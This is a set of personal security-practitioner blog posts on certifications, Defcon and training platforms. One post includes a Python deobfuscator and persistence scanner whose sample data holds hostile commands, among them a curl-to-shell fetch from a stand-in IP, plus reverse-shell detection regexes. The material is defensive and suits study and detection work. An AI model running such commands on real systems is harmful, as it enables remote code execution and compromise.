learning and training goals for 2024

It’s January, it’s cold, and I have a day off, so that makes for a great time to get introspective and look at my plans and goals for learning and training this year! Sometimes I look to make themes out of my years, and this year I’m probably due to stretch my red team/offensive legs again. I also had a shorter list last year, and this year seems like I’m swinging back into things. Hopefully not so heavily that I get burnt out, but I do have some pressure valves built in that I can pump. On the plus side, I don’t really have any intense things to renew all year.

Formal Training & Certifications

CISSP – It’s barely worth mentioning, but I do need to note to myself that my CISSP expires in April 2024, so I should renew that early on. That’s mostly about getting my CPEs entered.

CSA CCZT – A few years ago I took the CSA CCSK and passed. I saw last year they now have similar material and certificate centered on Zero Trust topics. I’m sketchy, but serviceable on the topic, and I’d like to just properly prove and improve that. This is fairly low pressure, too.

ISACA CISM – I’m not sure how or why this got on my list, but it’s on my official list for work, so I’m including it here until I decide to not do it. Or just do it. This isn’t a cheap exam, but is relatively inexpensive to study for other than the time. We’ll see where I can fit this in. Part of that equation is evaluating the benefits of this cert and its maintenance.

Informal Learning

I have access to a year of Antisyphon On-Demand courses that started very late in 2023. This means I have 25+ courses to consume. Low pressure, and I don’t intend to do all the labs, so this can be something I tackle in pieces.

I also have access to a year of HTB Academy. I mostly got this to gain eventual access to the tier 3 and tier 4 topics, but the rest of the modules can act as refreshers. There is a cert that is slightly intriguing in the Pen Tester path, but I’m not in the mood to entertain that right now.

…and access to MITRE ATT&CK Defender for a year. I’m not entirely sure what this will be, but I had some work budget to spend at the close of 2023, so signed up here. This is partly to see what this service is about and whether I suggest it to others on my team.

…and access to BlueTeamLabs. I’ve been doing this for several years now, and will have another year of access. This is mostly maintenance mode, which means doing new releases every few weeks and helping others.

OffSec Learning Unlimited has been a thing I’ve been eyeballing since it was first offered, and this year I’m putting it on this list. The above things I’ve already gotten access to, but this one is a heavier purchase and if work is willing to provide part of the cost, I’ll cover the rest, including the time commit. And a commit it will be, which is another reason I’ve not yet opened up this subscription. I want to make sure I’m in a place where I can spend a good portion of time for the price. I don’t have any plans to take another OffSec exam, but if I did I’d target the OSWE.

It’s hard to plan a red team year without some HTB time commit thrown in. I hope to dabble on this site again some more. I’m unsure if I’ll spring for VIP yet, but it’s possible, especially if it helps reinforce and practice HTB Academy modules using retired boxes. (On the downside here, HTB is a lot different in its user base than it was years ago. It’s very perturbing to do innocent searches for error messages or exploits against a technology only to find spoilers for live boxes quite readily available. This never happened years ago unless you knew the right people…)

It’s hard to commit to Defcon as it tends to be a big expense, plus risk of sickness. But, I’m putting it on here to figure out this plan before too late. I’d like to go, but it’s also OK to not go. And if I do go, it’s not just about planning hotel, flight, and budgets, but also activities such as any competitions I may want to prepare for.

Other & Parting Thoughts

Last year right around Defcon, I started taking up running for the second time in my life. I loved it, but got away from it late in the year as I was trying to figure out some mysterious ankle pain (on my right Achilles area). During my time, I lost about 35 pounds, and more than the raw number, I could tell the difference. So, I want to get back to exercising properly again, in whatever fashion I can, even if running ends up being too much impact. This has always just been about being lazy; I love the burn, I love the (good) soreness, and it’s never boring to me.

Lastly, work has a decent influence on what I do, since, well, they pay me and often I’m using budget for the above learning opportunities. I’m hoping to bring some gentle purple team sensibilities and practices to our team in 2024, which aligns with my own personal time focus. Not everyone has an interest in doing both attack and defense, and I consider that adaptability to be one of my strengths. One which I want to keep honing into the future. It’s really either that or continuing to build practical cloud experience in Azure and AWS! 🙂

reviewing my learning goals from 2023

I didn’t do a bunch of flashy things in 2023 on a learning or training front. I think I did more in 2023 that set up my 2024 than I actually accomplished! But, I really like to do these year over year. Of my goals:

  1. Renewed AWS Security Specialty – Renewed isn’t a great way to say it, really. I tested and passed the exam so that I could keep claiming this cert. This continues to still be one of the denser and harder tests I’ve taken in my professional career.
  2. Renewed SANS GWAPT – This one is a proper renewal that takes cold hard cash and some CPEs. In return, I get new Web App Pen Testing materials and the opportunity to keep saying I have it!
  3. Maintained top 3 in BlueTeamLabs – Mostly in maintenance mode on this site, and I do new challenges as they come out. Good practice for blue team skills!
  4. Huntress CTF – I may do a few CTFs in a year, but never over a whole month of time. The Huntress CTF took place over the month of October. My solo team finished 46/4210 teams and finished all 58 challenges. Pretty fun!
  5. HackTheBox – I got back into HTB for a brief spell, doing about 5 boxes including an Insane one dealing with Active Directory and Windows networks. I’ve since dropped back into the shadows here, but I know I’ll get back in again.
  6. Antisyphon On-Demand courses subscription – I’ve had this in the pocket for a while to get, and used some end-of-year budget to get this set up. This provides a year of access to all on-demand courses, which is pretty sick value. This was late in the year.
  7. HTB Academy subscription – Also spending some end-of-year budget to get access to this set of modules on HTB for a year.
  8. Defcon – I went to Defcon. I’ll hopefully go again.

That seems to be all I wrote down or wanted to mention! Did I miss a few things from my goals? Not really, but I did not spend as much time as I’d still like to with Kali Purple or the Splunk Attack Range. It probably helped that I didn’t post about my yearly plans until last June.

made it out to defcon 31

It’s been since Defcon 22 that I made it out to Vegas for the premiere hacker summer camp, but I finally got a chance to go out again, post-covid. (Spoiler: I’ve been covid-free since the outbreak, but brought it back with me from Defcon, presumably. I first showed symptoms 3 days after the con. Thankfully, vaccines and boosters make for a smoother ride.)

My goals this year were to not attend any main track talks, not wait in line for any talks, and to just relax and have some fun in whatever fashion that presented itself. I feel like I accomplished those goals just fine!

Rather than itemize or talk about a bunch of stuff that can be found in other places, here’s my list of Good and Bad things from my experience. Though, let’s be clear, this was overall a great time.

Bad

  1. 20,000+ people (I’m estimating) plus all the norms. So, my first Defcon was DC16 with about 8,000 folks, and then DC22 with about 22,000. And in those locations, you would walk around the casino area and probably 80%+ of the people present would be hackers. Right before the covid19 pandemic, Defcon was topping 30,000 attendees! That’s a huge mass of humanity! Now that Defcon is at Caesar’s Forum, this means the con sprawls across several Caesar’s properties. It also means as you wander the properties, there are also far more norms walking around, probably even about 50% of the people around at any given time. Personally, I’d rather be more surrounded by my people. Still, that’s a lotta people in small places, and it makes for some less than comfortable environs for an introvert who likes his space like myself. Thankfully, I know myself and my limits pretty well and can handle things just fine. And having more people means more con, so…the fact of having so many people together is both good and bad, but probably overall good.
  2. Still COVID. There’s still Covid around, which sucks. Thankfully wearing a mask the whole weekend is quite acceptable with this crowd. The problem is I don’t normally wear a mask for hours a day, and I realized I got pretty warm with one on all day. My body isn’t used to regulating down that heat with limiting mouth freedom! Between that and the dry air, it was pretty easy to start sweating.
  3. I was ill-prepared, tech-wise. I didn’t take much tech with me, basically a laptop. Turns out, I wanted to do contests! And get on the defcon wireless network! I sure could have used a portable monitor. More laptop resources. A better wifi adapter. Notes for next time, especially if I want to try more contests, which I do.
  4. Some villages were… I swung by almost all of the villages, and I got into several that were super fun and interesting (and packed). But some I didn’t get into at all due to busy talks taking up all the room capacity and creating lines outside. And some villages were literally just talks unless you pre-signed up for something. These latter villages left me super disappointed and made it feel like these are just alternate talk tracks and nothing else. App Sec, Cloud, and Red Team villages, to me, were simply not useful or accessible to me and I never got into any of them. And they were among my priority ones.
  5. I wasn’t prepared for the other events. Lots of Defcon content and contests start months in advance. The moment I commit to attending, I need to continually visit the site and forums and start getting an idea of what is available and what I’d like to do or check out.
  6. Food and Drink Prices. Oof, $12 beer bottles, $24 burgers, yikes. Thankfully there was an easily-found Walgreens just 3 minutes north of Harrah’s that was open 24/7 and provided essential fluids, snacks, and sandwiches to keep costs down. Close, fast, efficient.

Good

  1. So many contests! It’s been since DC22 that I attended, and the ability for Defcon to entertain and challenge 20,000+ people has matured a lot! I swung through the contest area several times, and each time I saw new things I missed previously. Even the villages had contests. I spent a day fighting up into the top 9 (of 220) of the Blue Team Village CTF, played and beat some demo game about Intelligence Operations and CTI, submitted threat model suggestions (which is something I’ve never formally done before), and poked at numerous puzzles and challenges. I probably would have spent far more time on the con floor doing these contests around like-minded folks if not for the covid spectre hovering about.
  2. Linecon + Merch. This is my second time staying up all night for Defcon registration. It’s now official, as Linecon! While we pre-registered already, my friend and I opted to still stay up all night and we were essentially first in line on the pre-reg side. We got in line at about 5pm, had our badges in hand at 7:05am the next morning, were among the first 30 in line for Merch, and hit up the vendor area shortly after. We were back in the room by 9am to upload loot and freshen up. While I’m not getting younger and the last time I stayed up all night was a previous Defcon, there are good points for this. First, there’s not a TON of things going on at Defcon on Thursday. Second, Linecon itself is fun and the people are excellent. (I also got my picture taken on the official Defcon stage as if I were giving a talk!) Third, you get full and first crack at merch and vendor gear and you get it out of the way before lines take hours and things sell out. This helps free up the rest of the con time for other things! (Or other lines to stand in!)
  3. Chillout room + SomaFM. Dude, I love SomaFM. I’ve been a listener since 2002. I love the chillout room at Defcon when you can get a reasonable seat and just do some contest shit or whatever. It’s still lots of people, but grab a drink or two and relax as you can! It’s just the perfect vibe.
  4. I was never lost! At the Riv or Rio I was constantly lost. I never really found myself lost in the Caesar’s properties. So, that’s cool!
  5. Villages with things to do. Hands on things at Lockpick and Physical Security villages were awesome. Even the Tampering village off to the side was informational!
  6. Movie night. I did movie night at DC16 and loved it, though it was pretty packed, but kinda skipped at DC22 in favor of parties/live music. But, this year I was spending time doing contests and had been sitting in the Chillout room. Then, when the live music started booming there, I took the vibe over to the movie night room and sat behind everyone else and continued doing hack stuff while also enjoying the movies. There was something about the vibe that just worked.

The Future

I have no idea how often I’ll get back to Defcon, but if I can do it every year, I am not sure I’d mind. Flying was 0 hassle this year, and really everything with regards to logistics and costs was fine. If I do go back, there are some things I want to keep in mind.

  1. Pre-plan more, especially contests. Man, seeing those black badge contests get wrapped up was super invigorating. While I have no skills that would help in the main Capture the Flag, there are other events I have a chance at if I can do some pre-planning and research/practice. I’d like to start on time with next year’s Blue Team Village CTF, and I’d love to try out the Capture the Packet. This pre-planning also means making sure I have gear that helps provide for success. Beefier laptop and portable monitor and wifi adapter, for starters. SE and Lockpicking could be fun contests, too, but definitely research the forums!
  2. Scav Hunt. The Scav Hunt always looks super interesting, and if I continue to know more people and first-timers at the con (e.g. coworkers), I might push to make doing the Scav Hunt a priority. That said, knowing a native in Vegas would probably help!
  3. Linecon. I’ll definitely do Linecon again. This year I took it easy as I was super wary about whether I could handle lack of sleep at my age, but things went fine. However, I’d like to bring a game or two, and maybe some sort of chair.
  4. BSides. I have never done BSides LV, but for a couple extra days, that seems like a fine way to go to actually see some talks and do a bit more casual conversing.

learning and training goals for 2023

It’s already June, which means almost half the year is over. But, I’d still like to post about my thoughts and goals and ideas for 2023. I should probably slow down and spend more time on other things, but even if I do that, these are still things I’d like to pursue or think I can get to this year.

I have a shorter list this year. Due to gentle life changes and getting older, one habit I’ll go on record (to keep myself accountable) is getting physically active again. I’ve already been going down this path, but it needs to be continued and expanded.

Formal Training/Certifications

Renew GIAC GWAPT (SEC542). This is completed already, though I still have a need to go through the new material and course recordings.

Renew AWS Security Specialty certification. This is completed already.

Renew CISSP. Also already done. This is just a fee plus CPEs, but I keep this on my list every year as a reminder.

Antisyphon course at WWHF. I’ve been doing training through Antisyphon for several years now, and there are still courses on offer that I want to attend. I may opt for a subscription format someday, but if not, I’d like to take something later this year with WWHF, either virtually or in person.

That’s really it for formal things. I only had one renewal exam to take this year, and no other major certifications on tap to pursue, though there are some topics that I could pursue, such as some red team courses/certs, or access to Offensive Security via subscription, or MS Azure/M365 certs. But, I just don’t want to commit time and/or money to them at this time. I suppose those could all be stretch goals or something to slot in if I feel the bug.

Informal Learning

Defcon. It’s been more than several years since I’ve been to Defcon. I’m going this year.

Books. I have lots of books to go through on various topics.

Courses. I have lots of course materials and/or things that I would like to get to on a more informal basis.

BlueTeamLabs.online. I still go through new content they release, but this is super infrequent and I otherwise have all of their content solved.

Purple team home lab. I’d actually like to stand up the Splunk Attack Range or Kali Purple or another blue team lab setup in my home lab. I already have a lab, but I don’t have, say, a full SIEM stood up or an attacker emulation environment set up at any given time (do you run the leaked and untrusted Cobalt Strike code on your home network?). I’d like to hone that process and then also consume it with self-directed activities like further C2 and attacker emulation practice. Basically, I want to be able to practice all aspects of purple teaming (blue and red) at home, including malware analysis and red team tradecraft. The key is being able to do this efficiently. It’s one thing to want to study advanced topics, but too often students like myself spend all their time on the environment and burn out before getting to the real juice. Standing up this environment needs to be as painless to me as standing up an AD environment or a Kali attack box or my normal home lab with firewalls and isolation. And often this comes down to rote practice, familiarity, and the right level of automation that isn’t itself onerous to maintain.

Parting Thoughts

That’s also really it on the informal side. This is the first year in a long time I’ve not had a subscription to some learning content that I was paying for on my own. I’ll get back to that for sure, but I’m taking a small break from pre-scheduled things.

And it’s not like I don’t get plenty of learning and geekery otherwise. I’m in year 23 of an IT and infosec career and work daily as a senior analyst with my blue and red feet in many ponds at the same time. There are really no days that go by where I’m not learning something new, practicing skills, or sharing my knowledge to someone.

reviewing my learning goals from 2022

Every year I try to make some learning and training goals and review my prior goals. This has gotten a lot looser in recent years, maybe due to time stretching outward in these crazy times.

I did lots of maintenance in 2022.

Formal Training/Certifications

Completed the Offensive Development course with Antisyphon virtually through Wild West Hackin’ Fest in the latter half of 2022 (yes, the link is to this year’s syllabus). This course was a 2-day exploration of writing and editing malware to get past EDR for successful execution on protected endpoints using Cobalt Strike and other red team structures. I really enjoyed this course as it really pushed my boundaries a bit. I just wished I had the time to go over it a second time for maximum uptake. The course says it is intermediate, but I would think this is really an advanced course if you want to follow along by doing the labs successfully.

Renewed my AWS Solutions Architect Associate certification (which also renewed the AWS Cloud Practitioner). See my post for these details.

Renewed my GIAC GCFA (FOR508) certification. This is really just paying a fee to get renewed plus updated materials and course recordings and lab files. I still need to actually go through the new stuff.

Renewed my CISSP. Again. Just fees and CPEs that needed recording.

Informal Training

I spent a ton of time in the early third of 2022 on the BlueTeamLabs.online (BTLO) site doing their lab investigations. I did this enough to eventually land in the #1 spot on the leaderboard. I’ve posted a bit about their labs already, and I’ve even done some write-ups on retired content. Even at the time of this writing, I’ve been trading off with a few others for the #1 thru #3 spots as BTLO releases new content.

I also continued to spend time on PentesterLab earning most of their badges and finishing something like 450 of 480 challenges (not all of which were actually available). I have since let this subscription lapse, but fully intend to get back on again when I have some time and money to spend. (And also finally figure out the code review 11 challenge that has been my bane!) This was nothing done over just one year, but rather multiple years.

I finally got on board with TryHackMe for the first time last year. While I like the platform, it’s definitely a different environment than HTB or BTLO. I’d like to do more here, but I also have to make sure I do things that are worthwhile as there is lots of content that is geared more towards entry knowledge levels. I spent most of my time on the Red Team tracks as I found these to be nice ways to review old skills, brush some dust off, and even learn some new tricks and tools.

Practical Malware Analysis book. I include this because it’s not just a book to casually peruse or even fully read, but is also a collection of exercises and labs to progress knowledge and practice techniques. I was turned further onto this than normal due to the “Counter” investigation on the BTLO platform. I didn’t get as far as I wanted on this last year, but I made progress and pushed my boundaries when it comes to using a debugger. I hope to do more.

renewed my aws security specialty certification

A few weeks ago I took an exam that renewed my AWS Security Specialty certification for another 3 years. This is an advanced “specialty” certification offered by AWS centered around, surprisingly, implementing and managing security within the AWS cloud platform.

I first took this back in 2020 and passed with a really good score. Reading my prior notes, I have many of the same thoughts this year as I did back then; this exam is frustrating to take. The questions are long, 30-40% felt like multiple answer questions. There were times I would just sit back in my testing chair, fold my arms over my chest, and get comfortable to read a long question several times. The longest question/answer was literally 4 screen lengths.

Study Plan

This time, I had access to Udemy through my employer, so I made use of several courses on that platform. I covered about 50% of the course content in “Ultimate AWS Certified Security Specialty SCS-C01” by Stephane Maarek. I also covered about 50% of the course content in “AWS Certified Security Specialty Course SCS-C01 (2023)” by Neal Davis. I then also went through practice exams for the certification on the Tutorials Dojo site by Jon Bonso.

I started with the Maarek course, but I honestly got through much of it and didn’t feel very confident. I was much happier going through the Davis course which included him going over hands-on show-and-tell segments which I find better than doing my own labs. It might be that I liked Davis, because I did Maarek first and got the wheels greased. The practice exams on the courses and the dedicated offering on Tutorials Dojo were all good questions, with the latter site being…let’s say…very close to exam types of questions.

If I were to do this again, I might look to see if my prior study course by Adrian Cantrill was still maintained and offered somewhere, otherwise I’d go back to Davis and Maarek for studying and Bonso for practice exams. I’m not sure I’d need anything beyond that other than my own experience and exposure in AWS through work and other various labs and study adventures.

What’s next?

I’m not sure. If I want to do anything else in AWS, I would probably sneak in the AWS Developer Associate somewhere. I’ve seen some study material on it, and I have to say there is a bunch of material that feels pretty basic for someone relatively new to IT overall. But, the things that go beyond those basics could be useful. I’d probably want to do that this year or in 2 years, though, just to get renewal lined up better? If I dive further into AWS cloud security, I would certainly do it as well as look into Solutions Architect Professional and the Networking specialty. At least to take them once and forever learn some new things. The Sysops Associate could be interesting, but I wonder if I might not learn a ton new from it that is useful to my current work anyway.

renewed my aws solutions architect associate certification

Almost 3 years ago, I earned my AWS Solutions Architect Associate certification. This past week, I took the exam again and passed in order to renew that certification for another 3 years. I drive about 90 minutes to my preferred Pearson VUE exam location, but this time I had to make the 90 minute drive back without knowing my exam outcome. Amazon now reviews things afterwards. I received no email yet, but within 24 hours my Exam History section on their certification portal was updated with my outcome. AWS has given me scores immediately on my last three exams; the technology exists, so give me a score right away and review things later to make it official if you need to. Anyway!

I did not study as much as I wanted or should have this year. I hadn’t intended to take the exam in October, but at the start of the month when I looked for times to book, my preferred venue had all sorts of times in October, and none at all in November or December. So, I snap booked as far out as I could, and got to work studying. Unfortunately as timing would go, Wild West Hackin’ Fest occurred which I not only attended virtually, but took some intense training in the first few days as well. I’ll come back to this later as notes to my future self 3 years from now.

Last go around, I used A Cloud Guru courses, Linux Academy courses (namely Adrian Cantrill’s excellent course), and practice exams from Jon Bonso (Tutorials Dojo). Since then, the landscape has changed as both Linux Academy and A Cloud Guru have been swallowed up by other players, and more honesty has been openly shared about the latter’s quality of offerings. (I really wasn’t terribly impressed 3 years ago, but ACG seemed to be everyone’s darling at the time.) This year I also have access to many Udemy offerings for free through my employer.

I started out purchasing and going through Jon Bonso’s Tutorials Dojo SAA-C03 course on his own platform. I loved his practice tests 3 years ago, so I figured I’d also do his course. In retrospect, this course wasn’t right for me, nor did I enjoy the platform. The platform doesn’t give me a good idea how long the whole course or sections are, and the player never saved the speed settings I preferred (1.25x-1.5x speed). The course itself was also…for lack of a better way to put it…not filling enough of my knowledge taste. Lots of slides. There is something to be said about even watching someone else use the AWS console to do things, which helps show the features and settings in more context. There was very little of that in this course.

Next, I started doing the set of SAA-C03 2022 Practice Exams on Tutorials Dojo. These are still absolutely excellent. Previously there were 6 exams, but now there seem to be 6 timed ones, 6 that show the answer as you go, and several other topical sets. There are times where it feels some questions reappear from one test to another, but I still feel these are the best practice questions that reflect both the subjects and the feel/style of the official AWS questions. Highly recommend.

Lastly, I went through most of the Udemy course, Ultimate AWS Certified Solutions Architect Associate SAA-C03, by Stephane Maarek. This is a phenomenal course that I absolutely loved. I have nothing bad to say about it at all. I love that Stephane goes through the materials, but then also goes through many of the services and concepts hands-on in the console where we get to see him build things and tear things down such that we could do these in our own AWS Accounts if we want to. I made it about 50% through this course and focused on my weaker areas.

And that was all the time I found I had to study, which left me rather worried and feeling less prepared than I prefer to feel for exams like this.

For future me, here are my suggestions. First, schedule early, even months out. This provides the most flexibility to study appropriately while also allowing plenty of time to do all the practice tests and really get used to the topics over time. Normally, I am very good about this and my planning, but this year has been hectic. Second, look up these authors (in any order) and take their courses: Adrian Cantrill, Stephane Maarek, Neal Davis, Jon Bonso (practice exams). Maarek and Davis also have practice exam sets, but I did not get a chance to sample them. Third, look at the AWS exam guidelines and scope document, but do not get distracted by new and specialized services. Keep focus on the core important services. You’re far more likely to get 5+ questions on Lambda than on AWS Polly. For the latter, know their elevator pitch, purpose, and if there are sub-services to know. Fourth, do practice exams every few days if possible. Don’t go through any a second time, as that is just an exercise in memorization/recall of specific questions. Amongst the authors above, there are *months* of practice exams to consume for relatively little cost. Do them, and the real exam will feel like a familiar place.

I think I said it before, but I’ll say it again this year: I feel that every single question on the exam is directly sourced from either the AWS official documentation or from the AWS blogs/whitepapers which cover using services, service features, or designing for certain use-cases/situations. And while that may seem obvious, it bears repeating to let that sink in: read the things. Also, any hands-on whether it’s watching someone else or doing it yourself in a lab or for your own personal or work stuff is necessary in order to see features and settings in context and in action. I mean, this certification is meant for people with 1+ years experience in the role!

Next up is renewing my AWS Security Specialty certification, and then in 3 years deciding what to renew or advance.

lab write-ups for blueteamlabs

I’ve done many labs and CTFs and lots of studying and taken so many notes (…so many notes…), but one thing I don’t think I’ve ever done is compose and publish a write-up on something. When BTLO retired a few lab investigations a few weeks ago, I thought maybe I’d spend some time to create a template and reorganize my notes into a public write-up I can share. And I did two of them!

First, I created a writeup for the PhishyV2 investigation which involved analyzing a phishing site and kit. This was a lab that was rated Hard on the BTLO site, and one of the earlier labs I completed after joining the site.

A week later, I made another writeup for the Obfuscated investigation. This one is geared around responding to an incident where an internal employee was given some malicious Python code which they executed, leading to a compromise of their Linux workstation. The investigation is really broken down into two main parts. First, analyzing and deobfuscating a Python script. And second, investigating the Linux environment for signs of persistence.
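As an added illustration of those two halves (this is example code written for this page, not the BTLO lab material or the author's write-up), the script below first peels an `exec(decode(...))` style Python obfuscation statically, by walking the AST and applying only a whitelist of pure decoders to the embedded literal rather than running the sample, and then scans the usual Linux persistence locations (crontab, shell rc files, systemd units, autostart entries) for suspicious command patterns. The obfuscated sample and the artifact contents are constructed inline; the function names, the decoder whitelist and the indicator regexes are my own assumptions, not anything from the lab.

```python
"""Static deobfuscation of layered exec(decode(...)) Python, then a scan of
Linux persistence artifacts. All sample inputs are constructed for this example."""
from __future__ import annotations

import ast
import base64
import re
import zlib

# --- Part 1: peel obfuscation layers without executing them ------------------

# Pure decoders we are willing to apply to a literal. Anything else (os.system,
# requests.get, eval on a variable, ...) is refused rather than executed.
DECODERS = {
    "b64decode": base64.b64decode,
    "decompress": zlib.decompress,
}


def build_sample_payload() -> str:
    """Constructed, harmless two-layer payload of the shape seen in phishing droppers."""
    inner = 'print("stage 2 reached")\n'
    layer1 = base64.b64encode(zlib.compress(inner.encode())).decode()
    stage1 = f'import zlib,base64\nexec(zlib.decompress(base64.b64decode("{layer1}")))\n'
    layer0 = base64.b64encode(stage1.encode()).decode()
    return f'import base64\nexec(base64.b64decode("{layer0}"))\n'


def _eval_decode_chain(node: ast.AST) -> bytes:
    """Evaluate a nested chain of whitelisted decoders applied to a literal."""
    if isinstance(node, ast.Constant) and isinstance(node.value, (str, bytes)):
        value = node.value
        return value.encode() if isinstance(value, str) else value
    if isinstance(node, ast.Call):
        func = node.func
        # bytes.decode() with no args does not change the payload for our purposes
        if isinstance(func, ast.Attribute) and func.attr == "decode" and not node.args:
            return _eval_decode_chain(func.value)
        name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", None)
        if name in DECODERS and len(node.args) == 1:
            return DECODERS[name](_eval_decode_chain(node.args[0]))
    raise ValueError(f"refusing to evaluate non-whitelisted node: {ast.dump(node)[:60]}")


def peel_layers(source: str, max_depth: int = 10) -> list[str]:
    """Return each successive stage of an exec(decode(...)) script, innermost last."""
    stages = [source]
    for _ in range(max_depth):
        tree = ast.parse(stages[-1])
        exec_calls = [
            n for n in ast.walk(tree)
            if isinstance(n, ast.Call) and isinstance(n.func, ast.Name)
            and n.func.id == "exec" and n.args
        ]
        if not exec_calls:
            break
        stages.append(_eval_decode_chain(exec_calls[0].args[0]).decode("utf-8", "replace"))
    return stages


# --- Part 2: scan persistence locations for suspicious entries ----------------

SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "download piped to shell"),
    (re.compile(r"base64\s+(-d|--decode)"), "inline base64 decode"),
    (re.compile(r"/(tmp|dev/shm|var/tmp)/\S+"), "executes from world-writable dir"),
    (re.compile(r"\bpython3?\s+-c\b"), "inline python one-liner"),
    (re.compile(r"\b(nc|ncat|bash -i)\b.*(\d{1,3}\.){3}\d{1,3}"), "reverse-shell style command"),
]

# Constructed artifact contents keyed by the path they would be read from.
SAMPLE_ARTIFACTS = {
    "/etc/crontab": (
        "SHELL=/bin/sh\n"
        "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
        "*/5 * * * * bob /tmp/.x/update.sh\n"
    ),
    "/home/bob/.bashrc": "# ~/.bashrc\nalias ll='ls -la'\necho aW1wb3J0IG9z | base64 -d | python3\n",
    "/etc/systemd/system/telemetry.service": (
        "[Service]\nExecStart=/bin/sh -c 'curl -s http://198.51.100.7/a | sh'\n"
    ),
    "/home/bob/.config/autostart/clean.desktop": '[Desktop Entry]\nExec=/usr/bin/python3 -c "import os"\n',
}


def scan_persistence(artifacts: dict[str, str]) -> list[tuple[str, int, str]]:
    """Return (path, line number, reason) for each non-comment line matching an indicator."""
    findings = []
    for path, content in artifacts.items():
        for lineno, line in enumerate(content.splitlines(), 1):
            stripped = line.strip()
            if not stripped or stripped.startswith("#"):
                continue
            for pattern, reason in SUSPICIOUS:
                if pattern.search(stripped):
                    findings.append((path, lineno, reason))
                    break  # one finding per line is enough for triage
    return findings


if __name__ == "__main__":
    for i, stage in enumerate(peel_layers(build_sample_payload())):
        print(f"--- stage {i} ---\n{stage}")
    for finding in scan_persistence(SAMPLE_ARTIFACTS):
        print(finding)
```

The deobfuscator deliberately throws on anything outside the decoder whitelist; a real sample that pulls its next stage from the network or builds it from a variable is a signal to stop and analyze by hand rather than to widen the whitelist. The persistence scan is a triage pass over text you have already collected from the host, so it runs fine against an offline disk image or exported files.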

I am no Word wizard, so this also let me brush some dust off my Word skills. I also normally do not take extensive screenshots for my personal notes, relying more often on text and terminal output. And this also helps me be more comfortable in quickly taking some screenshots to assist with my notes’ clarity. Often, taking screenshots has been something that gets me out of my normal flow of thought, and the only way to fix that is practice and ingraining it into my workflow.

Hopefully more labs retire in the future, and I’ll probably work on doing a few more write-ups for the harder or notable challenges.

my experiences on pentesterlab

In 2020, I started doing exercises on the PentesterLab (PTL) platform. To date, I’ve earned 16 badges (certificates) on the site, and have completed 440 exercises with only 13 currently available exercises left to tackle. Last night I became the 4th completion of the Brown Badge, and I realized I’ve never really shared or posted about my efforts or thoughts on the site.

PentesterLab is an online platform founded by Louis Nyffenegger which aims to teach students web application testing skills using hands-on curated labs that require practical skills to solve exercises. You know, for web pentesting and bug bounty hunting! The lab exercises are largely performed on a web application that the platform spins up, and students attempt to find a hidden key or achieve execution of a scoring binary on the target system to get the exercise completed. A huge section of code review challenges is an exception to this formula, where students provide the file name, line number, and type of vulnerability present in order to score the exercise as completed.

All exercises include an introductory description, though some are quick and throw students right into the challenge, while others provide lengthy, in-depth discussions of the techniques and exploits utilized. I’ve always found these to be at the right level of detail for me to see success on the platform, with a nice mix of research, reflection, and rote practice.

Many exercises have video solutions posted by Louis, but if you play along early enough before they get posted, you don’t have the luxury of a solution key to fall back onto. Plenty of the exercises still today do not have solutions posted, adding to the challenge of completing some of the badges. But, most of them do, which allows students to challenge themselves at their own tolerance levels before peeking at the videos. Also, those videos don’t actually give you the scoring key. To score a completion, students still have to go through the practical steps to exploit and solve the exercises.

Overall, it’s been an excellent platform that I’ve been on for a few years and that has helped me learn a ton of things relating to web app security.

Surprisingly, the exercises have a decent replay value to them. With so many, by the time six months pass, I won’t remember all the solution details if I revisit something. But, more importantly, I can solve them in different ways. A good example is the HTTP badge, which can be entirely solved using curl commands, but I also have chosen to solve them with Python and Ruby scripts as well. Many solutions can be derived using a scripting language of choice, providing additional opportunity to hone new skills. The platform accommodates this as you can run the scoring binary again, and the site will tell you it was a fresh score. And obviously you can just retrieve the correct key from the site for those challenges.

Another thing I like about the platform is how it dances along the line between being a platform of exercises versus a platform that is just a course. It really ends up doing both, which I appreciate and which fits into the way any penetration tester should be learning and tackling these things. Courses are great to teach things, but practical exercises are irreplaceable hands-on opportunities. And leaving some details out or fuzzy will cause the student to do some outside research, think a little, try and fail at things, and then try harder. And this is ultimately the mindset a tester needs to have, since they won’t normally have access to hints, nudges, or answers out in the real world of testing.

Much like almost any pentesting lab or series of challenges, there are also some very specifically vulnerable entries that are unlikely to be found in the wild, but they do act as ways to think about things differently, or open creative avenues that may be useful in the future, even if today that particular vulnerability is solved or just so contrived that it’s not realistic.

My scripting skills have markedly improved in Python and Ruby during this course. Coming into this, I was passable with Python and had 0 experience with Ruby beyond maybe running an exploit from EDB or something. But, during this course I’ve had the chance to write more Python and Ruby scripts, or edit and adjust existing ones or those from the answer videos, enough that I feel comfortable digging into deeper topics and weaponizing exploits. In addition, students can walk away with scripts that can act as frameworks for future endeavors. Maybe a script to generate a tampered JWT will work in other engagements, or maybe that deserializer can be used the same way for a test a year from now.

Likewise, I’ve used Burp Suite for many years, but like any complex tool, that skill only sticks around as long as one greases the wheels on a regular basis and uses it. I get to drop into Burp on most exercises, and poke and prod and learn new things.

And just like any pentesting learning platform, all of this is often about three important things: exposure, experience, and practice. PTL ends up providing all three, which is great for building a body of experience and confidence in the skills.

For someone looking to prep for something like the OSCP, I’d say there’s no real hand-holding here to get your testing platform up and running or for easing into understanding and using Kali, Linux, Burp, HTTP, or other possible tools. Still, the badges I suggest below to start out will be helpful to anyone going for their OSCP, as there are still plenty of web application exploits and targets present in the OSCP course and exam.

For someone looking to get into web app pentesting or bug bounties or even pentesting in general, I’d say do everything here! As far as skill level expected, I’d say something like the SANS SEC542 course and GWAPT exam probably can act as a more introductory-friendly way to dive into web app testing and understand the essentials, but I’d immediately follow that up with running through PTL. OSCP courses and things like eCPPT probably similarly can ease students less comfortable with things like Linux and Burp and web coding concepts.

Students who find the most success, though, should come to this platform with a comfort level in operating Kali Linux, web server architecture (most specifically Apache server operation), using Burp Suite (proxy and repeater, nothing intense), maybe a fuzzer like wfuzz, reading packet captures, and definitely have some comfort level in or ability to learn web code and scripting. Good examples will be some PHP, JavaScript, and Java, but mostly Python and Ruby. This may sound daunting, but most of this is about exposure and being in a position to take the next steps and not be hung up on what Python is or what cat /etc/passwd means or how to intercept using Burp. I’m not sure PTL is good for “My First Reverse Shell From a Web Server,” but it’ll be the next steps after the first one.

